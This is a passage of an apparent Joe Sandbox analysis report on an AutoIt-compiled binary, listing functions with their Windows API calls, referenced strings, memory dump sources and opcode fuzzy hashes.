Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 7ae25917ec15050de2400a7b6e94c99bf1824f8416343c3d7f579a38e2bc2c8c
Instruction ID: 59a9e029ea1e2b2ad049c8bded0c14d1e00404dc5617cfdaaf31073eb8699898
Opcode Fuzzy Hash: 7ae25917ec15050de2400a7b6e94c99bf1824f8416343c3d7f579a38e2bc2c8c
Instruction Fuzzy Hash: AEF05E31105659FADB126F54EC09FEE3F59BF06311F148010FB21611E28B7C5551DB99

Function 00772218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00772231
SetTextColor.GDI32(?,000000FF), ref: 0077223B
SetBkMode.GDI32(?,00000001), ref: 00772250
GetStockObject.GDI32(00000005), ref: 00772258
GetWindowDC.USER32(?,00000000), ref: 007ABE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 007ABE90
GetPixel.GDI32(00000000,?,00000000), ref: 007ABEA9
GetPixel.GDI32(00000000,00000000,?), ref: 007ABEC2
GetPixel.GDI32(00000000,?,?), ref: 007ABEE2
ReleaseDC.USER32(?,00000000), ref: 007ABEED

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: d4fde19a06e7c281744a812f7a364c3d6e39451d0b9b60a7ea59f921187f894d
Instruction ID: dbae2da522d78cb83701d03341867b74fbe2a27ef33f485623e12360d91a1859
Opcode Fuzzy Hash: d4fde19a06e7c281744a812f7a364c3d6e39451d0b9b60a7ea59f921187f894d
Instruction Fuzzy Hash: C3E03932104248EADF215F64EC4D7E83B20EB46332F04C366FA69880E28B7A4990DB16

Function 007C8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 007C871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,007C82E6), ref: 007C8722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007C82E6), ref: 007C872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,007C82E6), ref: 007C8736

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 739649b7a2b1825e31d2a9733cf725f4255ded958e528a09d03d523febf93cbd
Instruction ID: 4164fdc6f58974d03be0b29277361e1638e4192a1332230f7f42925cc67907b8
Opcode Fuzzy Hash: 739649b7a2b1825e31d2a9733cf725f4255ded958e528a09d03d523febf93cbd
Instruction Fuzzy Hash: F2E086366112119BD7605FF05D0CF663BACEF50791F18C82CF245C9040EE3C8441DB55

Function 007B1D5D Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 007B1D5D
GetDC.USER32(00000000), ref: 007B1D67
GetDeviceCaps.GDI32(00000000,0000000C), ref: 007B1D87
ReleaseDC.USER32(?), ref: 007B1DA8

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 45575bf5f296f84ad1b5cf5e749904a2a6970edde8d395530e9baed9c0cffed0
Instruction ID: e85cd170dcde3571722fa3e469dc62772a7df6355dd7da8f7030c7f1bbcd218f
Opcode Fuzzy Hash: 45575bf5f296f84ad1b5cf5e749904a2a6970edde8d395530e9baed9c0cffed0
Instruction Fuzzy Hash: 89E0CAB5800204EFCF01AF60D888AAD7BB1AF48391F10C42AE95AE6220CE3C8241DF49

Function 007B1D71 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 007B1D71
GetDC.USER32(00000000), ref: 007B1D7B
GetDeviceCaps.GDI32(00000000,0000000C), ref: 007B1D87
ReleaseDC.USER32(?), ref: 007B1DA8

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: a639bc14635fd164ee9081b661a96d7bf887d81fc568151171cf80f86796e6d4
Instruction ID: 8261ecf896c866d88f7c3f2f786b7e4167f87aafccfedc86b689354888e74d08
Opcode Fuzzy Hash: a639bc14635fd164ee9081b661a96d7bf887d81fc568151171cf80f86796e6d4
Instruction Fuzzy Hash: B6E05AB5800204AFCF11AF6098886AD7BA5AF58391B11C429E95AE6260DF7C9541DF49

Function 007CB2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 007CB4BE

Strings

AutoIt3GUI, xrefs: 007CB436
Container, xrefs: 007CB43B

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: ee5ed23ec58bc3c889e58eade189879170ec8940b6f9aaded07e72c9c189b4ee
Instruction ID: b7544e02b86e372be6d58e19f751421c6949647ec2904f28ec2e0728b3979d53
Opcode Fuzzy Hash: ee5ed23ec58bc3c889e58eade189879170ec8940b6f9aaded07e72c9c189b4ee
Instruction Fuzzy Hash: F4912470600601AFDB14DF64D885F6ABBE9FF48710F20856EF94ACB2A1DB74E845CB60

Function 007DAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0078FC86: _wcscpy.LIBCMT ref: 0078FCA9

Part of subcall function 00779837: __itow.LIBCMT ref: 00779862
Part of subcall function 00779837: __swprintf.LIBCMT ref: 007798AC

__wcsnicmp.LIBCMT ref: 007DB02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007DB0F6

Strings

LPT, xrefs: 007DB027

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 7564533d852053ba37c16a94f00f85ebe14f7895b8d48bbab65f549d2c78b131
Instruction ID: 464fe9b4a25d51382c553195f15bed8364cb1fc7d7e6e55912bbe69925aa1fe0
Opcode Fuzzy Hash: 7564533d852053ba37c16a94f00f85ebe14f7895b8d48bbab65f549d2c78b131
Instruction Fuzzy Hash: FC619275A00219EFCF14DF94C895EAEB7B4EF09310F11806AF916AB391D778AE44CB91

Function 00782957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00782968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00782981

Strings

@, xrefs: 00782975

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: c5ad127dc179d50395e09da2e5fba1e2f4d7be571f03d619cf78a233b7ebe18a
Instruction ID: 2f36eeb377b4013ce8815c1b80a754523365fc22635b7b1b43ef92fe79310850
Opcode Fuzzy Hash: c5ad127dc179d50395e09da2e5fba1e2f4d7be571f03d619cf78a233b7ebe18a
Instruction Fuzzy Hash: 015157724187449BE720EF10D88ABAFBBE8FF85390F41885DF2D9411A1DB748529CB67

Function 007D9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00774F0B: __fread_nolock.LIBCMT ref: 00774F29

_wcscmp.LIBCMT ref: 007D9824
_wcscmp.LIBCMT ref: 007D9837

Strings

FILE, xrefs: 007D9770

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: b02f32830049d48956b83d33c4ccae220b4f2b9f5ee478d1d1ca3187c334eb4a
Instruction ID: c3fe3b81f35e3974d5a7cbd12a12679da11a4ccf1dfecf35fb8e540ad0d225db
Opcode Fuzzy Hash: b02f32830049d48956b83d33c4ccae220b4f2b9f5ee478d1d1ca3187c334eb4a
Instruction Fuzzy Hash: 6741B871A00219FADF219AA0DC49FEFB7BDDF85710F01446AFA04F7291D779AA048B61

Function 007E258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007E259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007E25D4

Strings

|, xrefs: 007E25A5

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 27a1384bac74533a7a289d4b5b6d4a2e9eb12ff5225eb6d2bca7eed5923938c2
Instruction ID: df5c35c7c506a9b14ed36857cac68d6b6d12337dbdaf4269281c4c34ed6867ff
Opcode Fuzzy Hash: 27a1384bac74533a7a289d4b5b6d4a2e9eb12ff5225eb6d2bca7eed5923938c2
Instruction Fuzzy Hash: 3E315A71801109EBCF05EFA5CC89EEEBFB8FF08340F104059F918A6162EB395916DBA0

Function 007F7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 007F7B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007F7B76

Strings

', xrefs: 007F7ACA

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 6cc623b4c99687e003d76e69716c3ccace106d5df4c3297f728c65fe94cd1346
Instruction ID: 6613756d6ecb5ab19092cf81531606b6e07e88178623d69030b43488f1a71304
Opcode Fuzzy Hash: 6cc623b4c99687e003d76e69716c3ccace106d5df4c3297f728c65fe94cd1346
Instruction Fuzzy Hash: EC410874A0520D9FDB14CF69C881BEABBB5FF09300F11416AEA04EB351E774A951DF90

Function 007F6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 007F6B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007F6B53

Strings

static, xrefs: 007F6AB3

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: cf7a4491113afbeb15ba2a8a06b4e3baceea8d21c06e636862fe4910bd53e545
Instruction ID: 2139cb4fca769b7eaa7c639515ec2e13855206bf8b0a19c6a6e46ae14cc247db
Opcode Fuzzy Hash: cf7a4491113afbeb15ba2a8a06b4e3baceea8d21c06e636862fe4910bd53e545
Instruction Fuzzy Hash: 9F316FB1200608AEDB109F64CC41AFB77B9FF48760F108619FAA9D7290DA39AC51DB60

Function 007D28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007D2911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D294C

Strings

0, xrefs: 007D290A

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: cdafaed062f4d0337bec59440596d3b1f7297287a82f8b9b7be5b439dda873f2
Instruction ID: cdb798f8e8284c8ed7eb81c5ef5d7b7d3fe479528299dafe93c7beb562ee0f9a
Opcode Fuzzy Hash: cdafaed062f4d0337bec59440596d3b1f7297287a82f8b9b7be5b439dda873f2
Instruction Fuzzy Hash: F831E331600305AFEB24DF58C985BAEBBB8EF55350F14002AE9C1B62A2D778A943DB51

Function 007E39E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 007E3A66

Part of subcall function 00777DE1: _memmove.LIBCMT ref: 00777E22

Strings

AUTOITCALLVARIABLE%d, xrefs: 007E3A58
, $, xrefs: 007E3AA6

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: c385ae123d1b1358c46485b1c9fa0ac82afa9afa56b876c94ae65eb78c10ccbc
Instruction ID: c30f5d8412eccc98e336bc3f6f31131fb2b8d03a86ce689f2cbe02bbc7ca0210
Opcode Fuzzy Hash: c385ae123d1b1358c46485b1c9fa0ac82afa9afa56b876c94ae65eb78c10ccbc
Instruction Fuzzy Hash: 70219531601119EBCF14EF65CC89EAD77B5FF49340F408468F559A7281DB38EA81CB61

Function 007F66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007F6761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F676C

Strings

Combobox, xrefs: 007F672E

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 2a044eccc88536475b551da13bf7541efa180b42feb49b356a2935095c33b705
Instruction ID: fab73f51282491084fa38f6a9c8f71df0f1dd1cdbaf2bb48c1ef9af4a8082587
Opcode Fuzzy Hash: 2a044eccc88536475b551da13bf7541efa180b42feb49b356a2935095c33b705
Instruction Fuzzy Hash: 3F11867530020CAFEF11AF54DC85EBB376AEB54368F104125FA1497390D6799C5187B0

Function 007F6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00771D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00771D73
Part of subcall function 00771D35: GetStockObject.GDI32(00000011), ref: 00771D87
Part of subcall function 00771D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00771D91

GetWindowRect.USER32(00000000,?), ref: 007F6C71
GetSysColor.USER32(00000012), ref: 007F6C8B

Strings

static, xrefs: 007F6C4E

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 7880a92de4129fcb134a49a56d88cf5557e1ef5c272e06c9730c7cd23e03bcbc
Instruction ID: ed31ba28b542354c4801fcd8eb7f0871a825b7c2bddc7b72689de6a3429f3e94
Opcode Fuzzy Hash: 7880a92de4129fcb134a49a56d88cf5557e1ef5c272e06c9730c7cd23e03bcbc
Instruction Fuzzy Hash: E121FC72510209AFDF14DFB9CC45AFA7BB8FB08315F004529FA95D3250D639E851DB60

Function 007F6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 007F69A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007F69B1

Strings

edit, xrefs: 007F6986

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: efc867e39d3f39fc347346e175d236d4716e0be6a7288ab6f54e14f80b3c2ab1
Instruction ID: ae9e1728ccca04391363537342e6730405b4fbe166be739517451d96013805b2
Opcode Fuzzy Hash: efc867e39d3f39fc347346e175d236d4716e0be6a7288ab6f54e14f80b3c2ab1
Instruction Fuzzy Hash: F0116D71110108ABEB108E64DC45ABB3BA9EF05374F504728FAA5972E0CAB9EC50AB60

Function 007D29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007D2A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007D2A41

Strings

0, xrefs: 007D2A18

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: cce9bbc8afd8c45d823e2aa3df93b96b9bebf3fac8568ff683512293d182bb3b
Instruction ID: 8091580ff5db508c6eda828e9bf00429cf3020600dc13aaed3136bdd8336f9d8
Opcode Fuzzy Hash: cce9bbc8afd8c45d823e2aa3df93b96b9bebf3fac8568ff683512293d182bb3b
Instruction Fuzzy Hash: D511D032901124ABCB30DAA8D844BAA73B8EBD5300F048023EC55F73A2D738AD0BC791

Function 007E21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007E222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007E2255

Strings

<local>, xrefs: 007E221D

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
